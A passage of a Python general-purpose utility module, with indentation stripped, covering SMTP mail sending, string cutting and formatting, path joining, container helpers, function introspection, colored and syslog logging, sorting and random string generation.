server=smtplib.SMTP_SSL(self.server,self.port,context=context)
server.login(self.user, self.password)
except:
print('Login fail at the server({})'.format(self.server))
return False
else:
server=smtplib.SMTP(self.server,self.port)
if self.tls:
if not self.password:
print('It required mail server({}) login password'.format(self.server))
return False
if self.ssl:
context = ssl.create_default_context()
server.starttls(context=context)
else:
server.starttls()
if self.user is None: self.user=sender
server.login(self.user, self.password)
return server
#def Send(self,sender,receivers,title='Subject',msg='MSG',dbg=False,filename=None,html=False):
def Send(self,*receivers,**opts):
sender=opts.get('sender',opts.get('from','root@localhost'))
title=opts.get('title',opts.get('subject','Unknown Subject'))
msg=opts.get('msg',opts.get('body','No body'))
dbg=opts.get('dbg',False)
filename=opts.get('filename')
html=opts.get('html',False)
server=self.Server()
if not server: return False
if dbg: server.set_debuglevel(True)
if len(receivers) == 1 and isinstance(receivers[0],str):
receivers=receivers[0].split(',')
elif receivers:
receivers=list(receivers)
else:
receivers=opts.get('to',opts.get('recievers'))
if isinstance(receivers,str):
receivers=receivers.split(',')
elif isinstance(receivers,tuple) and len(receivers) == 2 and isinstance(receivers[0],str) and '@' not in receivers[0]:
receivers=[receivers]
email_body=self.Body(sender,receivers,title,msg,filename=filename,html=html)
if email_body:
try:
server.sendmail(sender, receivers, email_body)
server.quit()
return True
except:
return False
else:
print('something wrong input')
####################################STRING##################################################
def Cut(src,head_len=None,body_len=None,new_line='\n',out=str):
if not isinstance(src,str): return False
# if not isinstance(src,str):
# src='''{}'''.format(src)
source=src.split(new_line)
if len(source) == 1 and not head_len or head_len >= len(src):
return [src]
rt=[]
for src_idx in range(0,len(source)):
str_len=len(source[src_idx])
if not body_len:
rt=rt+[source[src_idx][i:i + head_len] for i in range(0, str_len, head_len)]
else:
if src_idx == 0:
rt.append(source[src_idx][0:head_len]) # Take head
if str_len > head_len:
rt=rt+[source[src_idx][head_len:][i:i + body_len] for i in range(0, str_len-head_len, body_len)]
## Cut body
#string_tmp=self.src[head_len:]
#string_tmp_len=len(string_tmp)
#for i in range(0, int(string_tmp_len/body_len)+1):
# if (i+1)*body_len > string_tmp_len:
# rt.append(string_tmp[body_len*i:])
# else:
# rt.append(string_tmp[body_len*i:(i+1)*body_len])
else:
rt=rt+[source[src_idx][i:i + body_len] for i in range(0, str_len, body_len)]
if rt and out in ['str',str]: return new_line.join(rt)
return rt
def cut_string(string,max_len=None,sub_len=None,new_line='\n',front_space=False,out_format=list):
rc=[]
if not isinstance(string,str):
string='{0}'.format(string)
if new_line:
string_a=string.split(new_line)
else:
string_a=[string]
if max_len is None or (max_len is None and sub_len is None):
if new_line and out_format in [str,'str','string']:
return string
return [string]
max_num=len(string_a)
space=''
if sub_len and front_space:
for ii in range(0,max_len-sub_len):
space=space+' '
elif sub_len is None:
sub_len=max_len
for ii in range(0,max_num):
str_len=len(string_a[ii])
if max_num == 1:
if max_len is None or max_len >= str_len:
if new_line and out_format in [str,'str','string']:
return string_a[ii]
return [string_a[ii]]
if sub_len is None:
rc=[string_a[i:i + max_len] for i in range(0, str_len, max_len)]
if new_line and out_format in [str,'str','string']:
return new_line.join(rc)
return rc
rc.append(string_a[ii][0:max_len])
string_tmp=string_a[ii][max_len:]
string_tmp_len=len(string_tmp)
if string_tmp_len > 0:
for i in range(0, (string_tmp_len//sub_len)+1):
if (i+1)*sub_len > string_tmp_len:
rc.append(space+string_tmp[sub_len*i:])
else:
rc.append(space+string_tmp[sub_len*i:(i+1)*sub_len])
# else:
# rc.append('')
if new_line and out_format in [str,'str','string']:
return new_line.join(rc)
return rc
def Path(*inp,**opts):
sym=opts.get('sym','/')
out=opts.get('out','str')
if inp:
full_path=[]
if isinstance(inp[0],str):
root_a=inp[0].split(sym)
if len(root_a):
if root_a[0] == '~':
full_path=os.environ['HOME'].split(sym)
else:
full_path=[root_a[0]]
for zz in range(1,len(root_a)):
if full_path and not root_a[zz]: continue
full_path.append(root_a[zz])
for ii in inp[1:]:
if isinstance(ii,str):
for zz in ii.split(sym):
if full_path and not zz: continue
if zz == '.': continue
if full_path and full_path[-1] != '..' and zz == '..':
del full_path[-1]
continue
full_path.append(zz)
if full_path:
if out in [str,'str']:return sym.join(full_path)
return full_path
return os.path.dirname(os.path.abspath(__file__)) # Not input then get current path
####################################KEYS##################################################
def Get(*inps,**opts):
key=None
if len(inps) >= 2:
src=inps[0]
key=inps[1:]
elif len(inps) == 1:
src=inps[0]
key=opts.get('key',None)
if isinstance(key,list):
key=tuple(key)
elif key is not None:
key=(key,)
else: #None key
return GET(src).Value(**opts)
return GET(src).Value(*key,**opts)
def krc(rt,chk='_',rtd={'GOOD':[True,'True','Good','Ok','Pass',{'OK'},0],'FAIL':[False,'False','Fail',{'FAL'}],'NONE':[None,'None','N/A',{'NA'}],'IGNO':['IGNO','Ignore',{'IGN'}],'ERRO':['ERR','Error','error','erro','ERRO',{'ERR'}],'WARN':['Warn','warn',{'WAR'}],'UNKN':['Unknown','UNKN',{'UNK'}],'JUMP':['Jump',{'JUMP'}],'TOUT':['timeout','TimeOut','time out','Time Out','TMOUT','TOUT',{'TOUT'}],'REVD':['cancel','Cancel','CANCEL','REV','REVD','Revoked','revoked','revoke','Revoke',{'REVD'}],'LOST':['lost','connection lost','Connection Lost','Connection lost','CONNECTION LOST',{'LOST'}]},default=False):
def trans(irt):
type_irt=type(irt)
for ii in rtd:
for jj in rtd[ii]:
if type(jj) == type_irt and ((type_irt is str and jj.lower() == irt.lower()) or jj == irt):
return ii
return 'UNKN'
rtc=Get(rt,'0|rc',out='raw',err='ignore',check=(list,tuple,dict))
nrtc=trans(rtc)
if chk != '_':
if not isinstance(chk,list): chk=[chk]
for cc in chk:
if trans(cc) == nrtc:
return True
if nrtc == 'UNKN' and default == 'org':
return rtc
if default == 'org': return rt
return default
return nrtc
def Delete(*inps,**opts):
if len(inps) >= 2:
obj=inps[0]
keys=inps[1:]
elif len(inps) == 1:
obj=inps[0]
keys=opts.get('key',None)
if isinstance(keys,list):
keys=tuple(keys)
elif keys is not None:
keys=(keys,)
default=opts.get('default',None)
_type=opts.get('type','index')
if isinstance(obj,(list,tuple)):
nobj=len(obj)
rt=[]
if _type == 'index':
nkeys=Abs(*tuple(keys),obj=obj,out=list)
for i in range(0,len(obj)):
if i not in nkeys:
rt.append(obj[i])
else:
for i in obj:
if i not in keys:
rt.append(i)
return rt
elif isinstance(obj,dict):
if isinstance(keys,(list,tuple,dict)):
for key in keys:
obj.pop(key,default)
else:
obj.pop(keys,default)
return obj
elif isinstance(obj,str):
nkeys=[]
for i in keys:
if isinstance(i,(tuple,str,int)):
tt=Abs(i,obj=obj,out=list)
if tt:
nkeys=nkeys+tt
rt=''
for i in range(0,len(obj)):
if i in nkeys:
continue
rt=rt+obj[i]
return rt
return default
def Replace(src,replace_what,replace_to,default=None):
if isinstance(src,str):
if replace_what[-1] == '$' or replace_what[0] == '^':
return re.sub(replace_what, replace_to, src)
else:
head, _sep, tail = src.rpartition(replace_what)
return head + replace_to + tail
if default == {'org'}: return src
return default
def Insert(src,*inps,**opts):
start=opts.pop('at',0)
default=opts.pop('default',False)
err=opts.pop('err',False)
force=opts.pop('force',False)
uniq=opts.pop('uniq',False)
if isinstance(src,(list,tuple,str)):
tuple_out=False
if isinstance(src,tuple) and force:
src=list(src)
tuple_out=True
if uniq:
new=[]
for ii in inps:
if ii not in src:
new.append(ii)
inps=tuple(new)
if isinstance(at,str):
if at in ['start','first']: src=list(inps)+src
if at in ['end','last']: src=src+list(inps)
elif len(src) == 0:
src=list(inps)
elif isinstance(start,int) and len(src) > start:
src=src[:start]+list(inps)+src[start:]
else:
if err:
return default
src=src+list(inps)
if tuple_out: return tuple(src)
elif isinstance(src,dict):
for ii in inps:
if isinstance(ii,dict):
src.update(ii)
if opts:
src.update(opts)
return src
def FirstKey(src,default=None):
if src:
if isinstance(src,(list,tuple)): return 0
try:
return next(iter(src))
except:
return default
return default
####################################FUNCTION##################################################
class FUNCTION:
def __init__(self,func=None):
if func:
if isinstance(func,str):
func=Global(func)
self.func=func
def Name(self):
return traceback.extract_stack(None, 2)[0][2]
def ParentName(self):
return traceback.extract_stack(None, 3)[0][2]
def Args(self,func=None,mode='defaults'):
if func is None: func=self.func
rc={}
args, varargs, keywords, defaults = inspect.getargspec(func)
if defaults is not None:
defaults=dict(zip(args[-len(defaults):], defaults))
del args[-len(defaults):]
rc['defaults']=defaults
if args:
rc['args']=args
if varargs:
rc['varargs']=varargs
if keywords:
rc['keywards']=keywords
if mode in ['*','all']:
return rc
if mode in rc:
return rc[mode]
def List(self,obj=None):
aa={}
if isinstance(obj,str):
obj=sys.modules.get(str)
if obj is not None:
for name,fobj in inspect.getmembers(obj):
if inspect.isfunction(fobj): # inspect.ismodule(obj) check the obj is module or not
aa.update({name:fobj})
return aa
def CallerName(self,detail=False):
try:
dep=len(inspect.stack())-2
if detail:
return sys._getframe(dep).f_code.co_name,sys._getframe(dep).f_lineno,sys._getframe(dep).f_code.co_filename
else:
name=sys._getframe(dep).f_code.co_name
if name == '_bootstrap_inner' or name == '_run_code':
return sys._getframe(3).f_code.co_name
return name
except:
return False
def Is(self,find=None,src=None):
if find is None: find=self.func
if src is None:
if isinstance(find,str):
#find=sys.modules.get(find)
find=Global().get(find)
return inspect.isfunction(find)
aa=[]
if not isinstance(find,str): find=find.__name__
if isinstance(src,str):
src=sys.modules.get(src)
if inspect.ismodule(src) or inspect.isclass(src):
for name,fobj in inspect.getmembers(src):
if inspect.isfunction(fobj): # inspect.ismodule(obj) check the obj is module or not
aa.append(name)
else:
for name,fobj in inspect.getmembers(src):
if inspect.ismethod(fobj): # inspect.ismodule(obj) check the obj is module or not
aa.append(name)
if find in aa: return True
return False
def argtype(arg,want='_',get_data=['_']):
type_arg=type(arg)
if want in get_data:
if type_arg.__name__ == 'Request':
return arg.method.lower()
return type_arg.__name__.lower()
if type(want) is str:
if type_arg.__name__ == 'Request':
if want.upper() == 'REQUEST' or want.upper() == arg.method:
return True
return False
else:
if type_arg.__name__.lower() == want.lower():
return True
else:
if type_arg == want:
return True
return False
def get_function_name():
return traceback.extract_stack(None, 2)[0][2]
def get_pfunction_name():
return traceback.extract_stack(None, 3)[0][2]
def get_function_args(func,mode='defaults'):
rc={}
args, varargs, keywords, defaults = inspect.getargspec(func)
if defaults is not None:
defaults=dict(zip(args[-len(defaults):], defaults))
del args[-len(defaults):]
rc['defaults']=defaults
if args:
rc['args']=args
if varargs:
rc['varargs']=varargs
if keywords:
rc['keywards']=keywords
if mode in ['*','all']:
return rc
if mode in rc:
return rc[mode]
def get_function_list(objName=None,obj=None):
aa={}
if obj is None and objName is not None:
obj=sys.modules[objName]
if obj is not None:
for name,fobj in inspect.getmembers(obj):
if inspect.isfunction(fobj): # inspect.ismodule(obj) check the obj is module or not
aa.update({name:fobj})
return aa
def get_caller_fcuntion_name(detail=False):
try:
dep=len(inspect.stack())-2
if detail:
return sys._getframe(dep).f_code.co_name,sys._getframe(dep).f_lineno,sys._getframe(dep).f_code.co_filename
else:
name=sys._getframe(dep).f_code.co_name
if name == '_bootstrap_inner' or name == '_run_code':
return sys._getframe(3).f_code.co_name
return name
except:
return False
def is_function(find,src=None):
if src is None:
if isinstance(find,str):
find=sys.modules.get(find)
return inspect.isfunction(find)
aa=[]
if not isinstance(find,str): find=find.__name__
if isinstance(src,str):
src=sys.modules.get(src)
if inspect.ismodule(src) or inspect.isclass(src):
for name,fobj in inspect.getmembers(src):
if inspect.isfunction(fobj): # inspect.ismodule(obj) check the obj is module or not
aa.append(name)
else:
for name,fobj in inspect.getmembers(src):
if inspect.ismethod(fobj): # inspect.ismodule(obj) check the obj is module or not
aa.append(name)
if find in aa: return True
return False
def code_error(email_func=None,email=None,email_title=None,email_server=None,log=None,log_msg='',default=None):
e=sys.exc_info()[0]
er=traceback.format_exc()
if log_msg:
log_msg='{}\n\n*SYS ERR:\n{}\n\n*FORM ERR:\n{}'.format(log_msg,e,er)
else:
log_msg='*SYS ERR:\n{}\n\n*FORM ERR:\n{}'.format(e,er)
if log: log('\n!!ERROR!!: {}'.format(log_msg),log_level=1)
if email_func and email and email_title:
a=email_func(email,email_title,log_msg,dj_ip=email_server)
TIME().Sleep(5)
return default
def printf(*msg,**opts):
log_p=False
log=opts.get('log',None)
log_level=opts.get('log_level',8)
dsp=opts.get('dsp','a')
func_name=opts.get('func_name',None)
date=opts.get('date',False)
date_format=opts.get('date_format','[%m/%d/%Y %H:%M:%S]')
intro=opts.get('intro',None)
caller=opts.get('caller',False)
caller_detail=opts.get('caller_detail',False)
msg=list(msg)
direct=opts.get('direct',False)
color=opts.get('color',None)
color_db=opts.get('color_db',{'blue': 34, 'grey': 30, 'yellow': 33, 'green': 32, 'cyan': 36, 'magenta': 35, 'white': 37, 'red': 31})
bg_color=opts.get('bg_color',None)
bg_color_db=opts.get('bg_color_db',{'cyan': 46, 'white': 47, 'grey': 40, 'yellow': 43, 'blue': 44, 'magenta': 45, 'red': 41, 'green': 42})
attr=opts.get('attr',None)
attr_db=opts.get('attr_db',{'reverse': 7, 'blink': 5,'concealed': 8, 'underline': 4, 'bold': 1})
syslogd=opts.get('syslogd',None)
if direct:
new_line=opts.get('new_line','')
else:
new_line=opts.get('new_line','\n')
logfile=opts.get('logfile',None)
logfile_type=type(logfile)
if logfile_type is str:
logfile=logfile.split(',')
elif logfile_type in [list,tuple]:
logfile=list(logfile)
else:
logfile=[]
for ii in msg:
if type(ii) is str and ':' in ii:
logfile_list=ii.split(':')
if logfile_list[0] in ['log_file','logfile']:
if len(logfile_list) > 2:
for jj in logfile_list[1:]:
logfile.append(jj)
else:
logfile=logfile+logfile_list[1].split(',')
msg.remove(ii)
if os.getenv('ANSI_COLORS_DISABLED') is None and (color or bg_color or attr):
reset='''\033[0m'''
fmt_msg='''\033[%dm%s'''
if color and color in color_db:
msg=fmt_msg % (color_db[color],msg)
if bg_color and bg_color in bg_color_db:
msg=fmt_msg % (color_db[bg_color],msg)
if attr and attr in attr_db:
msg=fmt_msg % (attr_db[attr],msg)
msg=msg+reset
# Make a Intro
intro_msg=''
if date and syslogd is False:
intro_msg='[{0}] '.format(datetime.now().strftime(date_format))
if caller:
call_name=get_caller_fcuntion_name(detail=caller_detail)
if call_name:
if len(call_name) == 3:
intro_msg=intro_msg+'{}({}:{}): '.format(call_name[0],call_name[1],call_name[2])
else:
intro_msg=intro_msg+'{}(): '.format(call_name)
if intro is not None:
intro_msg=intro_msg+intro+': '
# Make a Tap
tap=''
for ii in range(0,len(intro_msg)):
tap=tap+' '
# Make a msg
msg_str=''
for ii in msg:
if msg_str:
if new_line:
msg_str=msg_str+new_line+tap+'{}'.format(ii)
else:
msg_str=msg_str+'{}'.format(ii)
else:
msg_str=intro_msg+'{}'.format(ii)
# save msg to syslogd
if syslogd:
if syslogd in ['INFO','info']:
syslog.syslog(syslog.LOG_INFO,msg)
elif syslogd in ['KERN','kern']:
syslog.syslog(syslog.LOG_KERN,msg)
elif syslogd in ['ERR','err']:
syslog.syslog(syslog.LOG_ERR,msg)
elif syslogd in ['CRIT','crit']:
syslog.syslog(syslog.LOG_CRIT,msg)
elif syslogd in ['WARN','warn']:
syslog.syslog(syslog.LOG_WARNING,msg)
elif syslogd in ['DBG','DEBUG','dbg','debug']:
syslog.syslog(syslog.LOG_DEBUG,msg)
else:
syslog.syslog(msg)
# Save msg to file
if type(logfile) is str:
logfile=logfile.split(',')
if type(logfile) in [list,tuple] and ('f' in dsp or 'a' in dsp):
for ii in logfile:
if ii and os.path.isdir(os.path.dirname(ii)):
log_p=True
with open(ii,'a+') as f:
f.write(msg_str+new_line)
#if type(log).__name__ == 'function':
if Type(log,'function'):
log_func_arg=get_function_args(log,mode='all')
if 'args' in log_func_arg or 'varargs' in log_func_arg:
log_p=True
args=log_func_arg.get('args',[])
if args and len(args) <= 4 and ('direct' in args or 'log_level' in args or 'func_name' in args):
tmp=[]
for i in range(0,len(args)):
tmp.append(i)
if 'direct' in args:
didx=args.index('direct')
del tmp[didx]
args[didx]=direct
if 'log_level' in args:
lidx=args.index('log_level')
del tmp[lidx]
args[lidx]=log_level
if 'func_name' in args:
lidx=args.index('func_name')
del tmp[lidx]
args[lidx]=func_name
if 'date_format' in args:
lidx=args.index('date_format')
del tmp[lidx]
args[lidx]=date_format
args[tmp[0]]=msg_str
log(*args)
elif 'keywards' in log_func_arg:
log(msg_str,direct=direct,log_level=log_level,func_name=func_name,date_format=date_format)
elif 'defaults' in log_func_arg:
if 'direct' in log_func_arg['defaults'] and 'log_level' in log_func_arg['defaults']:
log(msg_str,direct=direct,log_level=log_level)
elif 'log_level' in log_func_arg['defaults']:
log(msg_str,log_level=log_level)
elif 'direct' in log_func_arg['defaults']:
log(msg_str,direct=direct)
else:
log(msg_str)
else:
log(msg_str)
# print msg to screen
if (log_p is False and 'a' in dsp) or 's' in dsp or 'e' in dsp:
if 'e' in dsp:
sys.stderr.write(msg_str+new_line)
sys.stderr.flush()
else:
sys.stdout.write(msg_str+new_line)
sys.stdout.flush()
# return msg
if 'r' in dsp:
return msg_str
def printf2(*msg,**opts):
ansi_escape = re.compile(r'\x1B\[[0-?]*[ -/]*[@-~]')
color_db=opts.get('color_db',{'blue': 34, 'grey': 30, 'yellow': 33, 'green': 32, 'cyan': 36, 'magenta': 35, 'white': 37, 'red': 31})
bg_color_db=opts.get('bg_color_db',{'cyan': 46, 'white': 47, 'grey': 40, 'yellow': 43, 'blue': 44, 'magenta': 45, 'red': 41, 'green': 42})
attr_db=opts.get('attr_db',{'reverse': 7, 'blink': 5,'concealed': 8, 'underline': 4, 'bold': 1})
dsp=opts.get('dsp','s')
limit=opts.get('limit',None)
if isinstance(limit,int):
level=opts.get('level',1)
if limit < level:
return
if not isinstance(dsp,str):
dsp='s'
filename=opts.get('filename',None)
color=opts.get('color',None)
bgcolor=opts.get('bgcolor',None)
color_mode=opts.get('color_mode','shell')
wrap=opts.get('wrap',None)
length=opts.get('length',None)
form=opts.get('form',False)
if opts.get('direct',False):
new_line=''
start_new_line=''
else:
start_new_line=opts.get('start_new_line','')
new_line=opts.get('new_line','\n')
filename=opts.get('filename',None)
msg_str=''
for ii in msg:
if msg_str:
msg_str='''{}{}{}'''.format(msg_str,new_line,ii)
else:
msg_str='''{}'''.format(ii)
#New line
if new_line:
msg_str=msg_str.split(new_line)
# Cut each line
if isinstance(length,int):
length=(length,)
if isinstance(length,(tuple,list)):
new_msg_str=[]
if len(length) == 1:
for mm in range(0,len(msg_str)):
new_msg_str=new_msg_str+STR(msg_str[mm]).Cut(head_len=length[0])
elif len(length) == 2 and len(msg_str):
new_msg_str=new_msg_str+STR(msg_str[0]).Cut(head_len=length[0],body_len=length[1])
if len(msg_str) > 1:
for mm in range(1,len(msg_str)):
new_msg_str=new_msg_str+STR(msg_str[mm]).Cut(head_len=length[1])
msg_str=new_msg_str
# wrap each line
if isinstance(wrap,int):
wrap=(wrap,)
if isinstance(wrap,(tuple,list)):
if len(wrap) == 1:
for mm in range(0,len(msg_str)):
msg_str[mm]=tap[0]+msg_str[mm]
elif len(wrap) == 2 and len(msg_str):
msg_str[0]=tap[0]+msg_str[0]
if len(msg_str) > 1:
for mm in range(1,len(msg_str)):
msg_str[mm]=tap[1]+msg_str[mm]
msg_str=new_line.join(msg_str)
if color in ['clear','clean','remove','del','delete','mono']:
if color_mode == 'shell':
msg_str=ansi_escape.sub('',msg_str)
elif color:
msg_str=COLOR().String(msg_str,color,bg=False,attr=False,mode=color_mode)
elif bgcolor:
msg_str=COLOR().String(msg_str,bgcolor,bg=True,mode=color_mode)
# return msg
if 'f' in dsp:
if isinstance(filename,(str,list,tuple)):
if isinstance(filename,str):filename=filename.split(',')
for ff in filename:
if GET(ff).Dirname():
with open(ff,filemode) as f:
f.write(msg_str+new_line)
else:
dsp=dsp+'s' # if nothing filename then display it on screen
if 's' in dsp or 'a' in dsp:
if form:
try:
msg_str=ast.literal_eval(msg_str)
pprint(msg_str)
except:
sys.stdout.write(start_new_line+msg_str+new_line)
sys.stdout.flush()
else:
sys.stdout.write(start_new_line+msg_str+new_line)
sys.stdout.flush()
if 'e' in dsp:
sys.stderr.write(start_new_line+msg_str+new_line)
sys.stderr.flush()
if 'r' in dsp:
if form:
try:
return ast.literal_eval(msg_str)
except:
return start_new_line+msg_str+new_line
else:
return start_new_line+msg_str+new_line
def sprintf(string,*inps,**opts):
if not isinstance(string,str): return False,string
#"""ipmitool -H %(ipmi_ip)s -U %(ipmi_user)s -P '%(ipmi_pass)s' """%(**opts)
#"""{app} -H {ipmi_ip} -U {ipmi_user} -P '{ipmi_pass}' """.format(**opts)
#"""{} -H {} -U {} -P '{}' """.format(*inps)
#"""{0} -H {1} -U {2} -P '{3}' """.format(*inps)
ffall=[re.compile('\{(\d*)\}').findall(string),re.compile('\{(\w*)\}').findall(string),re.compile('\%\((\w*)\)s').findall(string),re.compile('\{\}').findall(string)]
i=0
for tmp in ffall:
if i in [0,1]: tmp=[ j for j in tmp if len(j) ]
if tmp:
if i == 0:
mx=0
for z in tmp:
if int(z) > mx: mx=int(z)
if inp:
if len(inp) > mx: return string.format(*inp)
elif opts:
if len(opts) > mx: return string.format(*opts.values())
return False,"Need more input (tuple/list) parameters(require {})".format(mx)
elif 0< i < 2:
new_str=''
string_a=string.split()
oidx=0
for ii in tmp:
idx=None
if '{%s}'%(ii) in string_a:
idx=string_a.index('{%s}'%(ii))
elif "'{%s}'"%(ii) in string_a:
idx=string_a.index("'{%s}'"%(ii))
if isinstance(idx,int):
if ii in opts:
string_a[idx]=string_a[idx].format(**opts)
elif ii in opts:
for jj in range(0,len(string_a)):
if '{%s}'%(ii) in string_a[jj]:
string_a[jj]=string_a[jj].format(**opts)
return True,' '.join(string_a)
elif i == 2:
new_str=''
string_a=string.split()
oidx=0
for ii in tmp:
idx=None
if '%({})s'.format(ii) in string_a:
idx=string_a.index('%({})s'.format(ii))
elif "'%({})'".format(ii) in string_a:
idx=string_a.index("'%({})s'".format(ii))
if isinstance(idx,int):
if ii in opts:
string_a[idx]=string_a[idx]%(opts)
elif ii in opts:
for jj in range(0,len(string_a)):
if '%({})s'.format(ii) in string_a[jj]:
string_a[jj]=string_a[jj]%(opts)
return True,' '.join(string_a)
elif i == 3:
if inp:
if len(tmp) == len(inp): return string.format(*inp)
return False,"Mismatched input (tuple/list) number (require:{}, input:{})".format(len(tmp),len(inp))
elif opts:
if len(tmp) == len(opts): return string.format(*opts.values())
return False,"Mismatched input (tuple/list) number (require:{}, input:{})".format(len(tmp),len(opts))
i+=1
return True,string
def format_print(string,rc=False,num=0,bstr=None,NFLT=False):
string_type=type(string)
rc_str=''
chk=None
bspace=space(num)
# Start Symbol
if string_type is tuple:
if bstr is None:
if NFLT:
rc_str='%s('%(rc_str)
else:
rc_str='%s%s('%(bspace,rc_str)
else:
rc_str='%s,\n%s%s('%(bstr,bspace,rc_str)
elif string_type is list:
if bstr is None:
if NFLT:
rc_str='%s['%(rc_str)
else:
rc_str='%s%s['%(bspace,rc_str)
else:
rc_str='%s,\n%s%s['%(bstr,bspace,rc_str)
elif string_type is dict:
if bstr is None:
rc_str='%s{'%(rc_str)
else:
rc_str='%s,\n%s %s{'%(bstr,bspace,rc_str)
rc_str='%s\n%s '%(rc_str,bspace)
# Print string
if string_type is list or string_type is tuple:
for ii in list(string):
ii_type=type(ii)
if ii_type is tuple or ii_type is list or ii_type is dict:
if not ii_type is dict:
num=num+1
rc_str=format_print(ii,num=num,bstr=rc_str,rc=True)
else:
if chk == None:
rc_str='%s%s'%(rc_str,STR(str_format_print(ii,rc=True)).Tap())
chk='a'
else:
rc_str='%s,\n%s'%(rc_str,STR(str_format_print(ii,rc=True)).Tap(space=bspace+' '))
elif string_type is dict:
for ii in string.keys():
ii_type=type(string[ii])
if ii_type is dict or ii_type is tuple or ii_type is list:
num=num+1
if ii_type is dict:
tmp=format_print(string[ii],num=num,rc=True)
else:
tmp=format_print(string[ii],num=num,rc=True,NFLT=True)
rc_str="%s,\n%s %s:%s"%(rc_str,bspace,str_format_print(ii,rc=True),tmp)
else:
if chk == None:
rc_str='%s%s'%(rc_str,STR("{0}:{1}".format(str_format_print(ii,rc=True),str_format_print(string[ii],rc=True))).Tap())
chk='a'
else:
rc_str='%s,\n%s'%(rc_str,STR("{0}:{1}".format(str_format_print(ii,rc=True),str_format_print(string[ii],rc=True))).Tap(space=bspace+' '))
# End symbol
if string_type is tuple:
rc_str='%s\n%s)'%(rc_str,bspace)
elif string_type is list:
rc_str='%s\n%s]'%(rc_str,bspace)
elif string_type is dict:
if bstr is None:
rc_str='%s\n%s}'%(rc_str,bspace)
else:
rc_str='%s\n%s }'%(rc_str,bspace)
else:
rc_str=string
# Output
if rc:
return rc_str
else:
print(rc_str)
def format_string(string,inps):
cmd=''
if isinstance(string,dict):
cmd=string['cmd']
string=string['base']
type_inps=type(inps)
if type_inps is dict:
if '%(' in string:
if '%s' in string:
return False,"name placehoder can't get %s format"
try:
return True,string % inps + ' '+cmd
except:
return False,"""string:{} input:{}""".format(string,inps)
elif re.compile('{(\w.*)}').findall(string):
if re.compile('{\d*}').findall(string):
return False,"name placehoder can't get {} format"
return True,string.format(**inps) + ' '+cmd
else:
if '%s' in string and type_inps in [tuple,list]:
if '%(' in string:
return False,"%s format string can't get name placeholder format"
return True,string % tuple(inps) + ' '+cmd
elif re.compile('{\d*}').findall(string) and type_inps in [tuple,list]:
if re.compile('{(\w.*)}').findall(string):
return False,"{} format string can't get name placeholder format"
return True,string.format(*tuple(inps)) + ' '+cmd
else:
return None,string+' '+cmd
def format_string_dict(string):
if isinstance(string,dict):
string='''{}'''.format(string['base'])
if '%(' in string or re.compile('{(\w.*)}').findall(string):
return True
return False
def Sort(src,reverse=False,func=None,order=None,field=None,base='key',sym=None):
if isinstance(src,str) and sym is not None: src=src.split(sym)
if isinstance(src,dict) and base == 'data':
field=1
def _cint_(e):
try:
if isinstance(field,int):
if isinstance(e,(list,tuple)) and len(e) > field:
return int(e[field])
else:
return 9999999
return int(e)
except:
return e
def _cstr_(e):
if isinstance(field,int):
if isinstance(e,(list,tuple)) and len(e) > field:
return '''{}'''.format(e[field])
else:
return 'zzzzzzzzz'
return '''{}'''.format(e)
if isinstance(src,(list,tuple)):
if order in [int,'int','digit','number']:
#def _cint_(e):
# try:
# if isinstance(field,int):
# if isinstance(e,(list,tuple)) and len(e) > field:
# return int(e[field])
# else:
# return 9999999
# return int(e)
# except:
# return e
return self.root.sort(reverse=reverse,key=_cint_)
elif order in [str,'str']:
#def _cint_(e):
# if isinstance(field,int):
# if isinstance(e,(list,tuple)) and len(e) > field:
# return '''{}'''.format(e[field])
# else:
# return 'zzzzzzzzz'
# return '''{}'''.format(e)
#return self.root.sort(reverse=reverse,key=_cint_)
return self.root.sort(reverse=reverse,key=_cstr_)
else:
if isinstance(field,int):
#def _cint_(e):
# if isinstance(e,(list,tuple)) and len(e) > field:
# return e[field]
return self.root.sort(reverse=reverse,key=_cint_)
else:
return self.root.sort(reverse=reverse,key=func)
elif isinstance(src,dict):
lst=[]
if base == 'key':
lst=list(self.keys())
if order in [int,'int','digit','number']:
#def _cint_(e):
# try:
# return int(e)
# except:
# return e
return lst.sort(reverse=reverse,key=_cint_)
elif order in [str,'str']:
#def _cint_(e):
# return '''{}'''.format(e)
#return lst.sort(reverse=reverse,key=_cint_)
return lst.sort(reverse=reverse,key=_cstr_)
else:
return lst.sort(reverse=reverse,func=func)
elif base == 'value':
lst=self.items()
if order in [int,'int','digit','number']:
#def _cint_(e):
# try:
# return int(e[1])
# except:
# return e[1]
lst.sort(reverse=reverse,key=_cint_)
elif order in [str,'str']:
#def _cint_(e):
# return '''{}'''.format(e[1])
#lst.sort(reverse=reverse,key=_cint_)
lst.sort(reverse=reverse,key=_cstr_)
else:
lst.sort(reverse=reverse,func=func)
return [i[0] for i in lst]
def Update(src,*inps,**opts):
at=opts.pop('at',0)
err=opts.pop('err',False)
default=opts.pop('default',False)
force=opts.pop('force',False)
sym=opts.pop('sym',None)
if isinstance(src,(list,tuple,str)):
if isinstance(src,str) and sym: src=src.split(sym)
tuple_out=False
if isinstance(src,tuple) and force:
src=list(src)
tuple_out=True
n=len(src)
if n == 0:
if err is True:
return default
else:
src=list(inps)
elif isinstance(at,int) and n > at:
for i in range(0,len(inps)):
if n > at+i:
src[at+i]=inps[i]
elif err is True:
return default
else:
src=src+list(inps)[i:]
break
elif isinstance(at,(tuple,list)):
if len(inps) == len(at):
for i in range(0,len(at)):
if isinstance(at[i],int) and n > at[i]:
src[at[i]]=inps[i]
elif err is True:
return default
else:
src.append(inps[i])
if tuple_out: return tuple(src)
return src
elif isinstance(src,dict):
for ii in inps:
if isinstance(ii,dict):
src.update(ii)
if opts:
src.update(opts)
return src
def Random(length=8,strs=None,mode='*',letter='*',default=1):
if mode in [int,'int','num','number']:
if isinstance(strs,(list,tuple)) and len(strs) == 2:
try:
s=int(strs[0])
n=int(strs[1])
return random.randint(s,n)
except:
pass
s=0
n=''
for i in range(0,length):
n=n+'9'
if n:
return random.randint(s,int(n))
return default
new=''
# if mode in [int,'int','num']:
# for i in range(0,length):
# new='{0}{1}'.format(new,random.randint(0,9))
# return int(num)
if not isinstance(strs,str) or not strs:
strs=''
if 'alpha' in mode or mode in ['all','*']:
if letter == 'upper':
strs=string.ascii_uppercase
elif letter == 'lower':
strs=string.ascii_lowercase
elif letter in ['*','all']:
strs=string.ascii_letters
if 'num' in mode or mode in ['all','*']:
strs=strs+string.digits
if 'char' in mode or 'sym' in mode or mode in ['all','*']:
strs=strs+string.punctuation
# if mode in ['all','*','alphanumchar']:
